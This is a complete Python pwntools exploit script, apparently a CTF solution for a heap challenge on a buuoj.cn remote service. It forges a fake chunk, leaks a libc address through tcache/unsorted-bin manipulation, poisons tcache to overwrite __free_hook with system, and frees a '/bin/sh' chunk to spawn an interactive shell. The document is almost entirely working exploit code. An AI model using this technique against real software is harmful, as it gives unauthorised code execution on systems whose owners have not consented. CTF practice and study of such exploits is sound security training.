| from pwn import *
# Connection to the challenge service and the local libc copy whose
# symbol offsets are used for the address arithmetic further down.
sh = remote('node3.buuoj.cn', 29203)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')

# Symbol offsets relative to the libc base (resolved from the local file).
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

# Forged chunk layout sent as the "name": one 0x90-sized header followed by
# 0x80 bytes of filler, then two 0x20-sized headers each padded with 0x10 bytes.
fake_chunk = ''.join([
    p64(0x602110),
    p64(0x91),
    'a' * 0x80,
    (p64(0) + p64(0x21) + 'a' * 0x10) * 2,
])
sh.sendlineafter('name:', fake_chunk)


def add(size, content):
    """Drive menu option 1 ('add'): answer the size prompt with ``size``
    and the data prompt with ``content`` (sent without a trailing newline)."""
    for prompt, reply in (('Choice:', '1'), ('size:', str(size))):
        sh.sendlineafter(prompt, reply)
    sh.sendafter('data:', content)
def edit(index, size, content):
    """Drive menu option 2 ('edit'): select entry ``index``, answer the size
    prompt with ``size`` and the data prompt with ``content`` (no newline)."""
    replies = (
        ('Choice:', '2'),
        ('index:', str(index)),
        ('size:', str(size)),
    )
    for prompt, reply in replies:
        sh.sendlineafter(prompt, reply)
    sh.sendafter('data:', content)
def delete(index):
    """Drive menu option 3 ('delete') for entry ``index``."""
    for prompt, reply in (('Choice:', '3'), ('index:', str(index))):
        sh.sendlineafter(prompt, reply)
def show_name():
    """Drive menu option 4 ('show name'); the caller handles the prompts
    that follow it."""
    choice = '4'
    sh.sendlineafter('Choice:', choice)
def _rewrite_name(payload):
    """Show the name, confirm the edit prompt and send ``payload`` as the
    new name (without a trailing newline)."""
    show_name()
    sh.sendlineafter('edit:', 'Y')
    sh.sendafter('name:', payload)


# Seven 0x7F-byte entries, then free them all plus index 20.
for _ in range(7):
    add(0x7F, 'a' * 0x10)
for idx in range(7):
    delete(idx)
delete(20)

# Overwrite the name with 0x10 filler and read the 6 bytes echoed right after it.
_rewrite_name('a' * 0x10)
sh.recvuntil('a' * 0x10)
main_arena_xx = u64(sh.recv(6).ljust(8, '\x00'))

# Page-align the leaked value and restore the low 12 bits of __malloc_hook's
# offset; everything else is derived from the resulting libc base.
malloc_hook_addr = (main_arena_xx & ~0xFFF) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s

for label, addr in (
    ('libc_base=', libc_base),
    ('free_hook_addr=', free_hook_addr),
    ('system_addr=', system_addr),
):
    print label, hex(addr)

# Second name rewrite: a 0x90-sized header, then allocate/free one 0x20 entry.
_rewrite_name(p64(0) + p64(0x91))
add(0x20, 'a' * 0x20)
delete(0)

# Third name rewrite: a 0x30-sized header followed by free_hook_addr, then
# two 0x20 allocations ('/bin/sh' and system_addr) and a final delete.
_rewrite_name(p64(0) + p64(0x31) + p64(free_hook_addr))
add(0x20, '/bin/sh\x00')
add(0x20, p64(system_addr))
delete(0)

sh.interactive()